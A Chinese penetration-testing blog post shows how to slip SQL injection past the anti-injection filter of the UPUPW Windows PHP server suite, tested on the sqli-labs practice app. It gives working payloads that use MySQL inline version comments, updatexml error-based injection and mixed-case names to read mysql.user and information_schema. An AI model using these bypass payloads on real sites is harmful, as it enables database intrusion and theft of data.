← 返回首页

投稿文章:UPUPW注入绕过(php+mysql+apache)

作者:perl6
发布时间:2017-07-04 19:16:22
浏览:6396    评论:8

投稿文章:UPUPW注入绕过(php+mysql+apache)

2017-07-04 19:16:22 8 6396
Apache版UPUPW

介绍:

UPUPW是目前Windows平台下最具特色的Web服务器PHP套件,包括Apache版、Ngix版和Kangle版:Apache/Nginx+PHP+MySQL+phpMyAdmin+Xdebug+Memcached+eAccelerator+ZendGuardLoader/Optimizer+。UPUPW PHP套件省去了您搭建Web服务器PHP环境的复杂程序,下载解压到装有任意Windows系统电脑的非中文目录即可运行。绿色,安全,稳定,高速!UPUPW自身带有waf的功能。


环境:

Win7
Sqllibs
Apache版UPUPW PHP5.6系列


安装好后开启upupw自带的防注入功能:




测试select from:




利用内联即可。

即然select from 能绕, 那我们就可以用报错注入。

直接使用updatexml函数测试,upupw没有防注:


concat也没有挡截:


select 1:


利用上面的/*!36000select*/from, 可以这样注:
http://localhost/sqli-labs-master/Less-1/?id=1'  and updatexml(1,concat('~',(/*!36000select 1*/ from mysql.user ),'~'),3)-- -


关键是select from, 用内联, 把字段写到/*!36000select  */里。
后面如果再有防注提示的话, 再用内联, 配合太小写混合即可绕过。
http://localhost/sqli-labs-master/Less-1/?id=1'  and updatexml(1,concat('~',(/*!36000select table_name*/ from /*!information_schema*/.tAbleS limit 1),'~'),3)-- -
类别 渗透测试

关于作者

perl63篇文章36篇回复